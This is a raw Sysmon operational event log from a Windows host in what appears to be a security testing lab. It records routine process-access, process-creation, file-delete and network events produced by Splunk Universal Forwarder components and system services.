22:02:40.907{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.907{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.907{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.907{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8480-613A-FD96-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.907{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8480-613A-FD96-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.904{B81B27B7-8480-613A-FD96-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035129413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:05.372{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62275-false10.0.1.12-8000- 10341000x800000000000000035129412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.586{B81B27B7-8480-613A-FC96-03000000C801}71481584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=252FC4A1784458FB78B037BF11ED2559,SHA256=C843BA8CAEFD409508ED21A7B76C11DE66BB6708CD59483ED42CBFE667FE2028,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.406{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8480-613A-FC96-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.404{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.404{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.403{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.403{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8480-613A-FC96-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.403{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8480-613A-FC96-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.387{B81B27B7-8480-613A-FC96-03000000C801}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5BD0F4C1D813F2FFD6DC671E8A2343A,SHA256=18FCE501E174AEDD9330D6DD4AAC3D996168A11F3CA0A20779EA6823E25F0DAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC37170920A105A6B590F4B6FFE02A47,SHA256=7546DBA6EF2924DEC7C1CF193214CFD28609EF50854765347B39DF3E845CEE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.606{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8481-613A-FE96-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.603{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.603{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.603{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.603{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.603{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8481-613A-FE96-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.602{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8481-613A-FE96-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.586{B81B27B7-8481-613A-FE96-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.539{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13AF3C56522D09F6052BCFD390EFC48A,SHA256=7EF5E653680DEF5105546EBDD400F97F1F759112EAFB3FC31A6DE0B3D45A6D55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:41.070{B81B27B7-8480-613A-FD96-03000000C801}64403780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.754{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5BD0F4C1D813F2FFD6DC671E8A2343A,SHA256=18FCE501E174AEDD9330D6DD4AAC3D996168A11F3CA0A20779EA6823E25F0DAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.685{B81B27B7-8482-613A-0097-03000000C801}1740ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:42.601{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F965410F76F863CB8FBF530EA89C8E6,SHA256=D85A0996F916EA3A6529061C271DFC4CB678FC1ECDE7EB306E8217522C0210C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 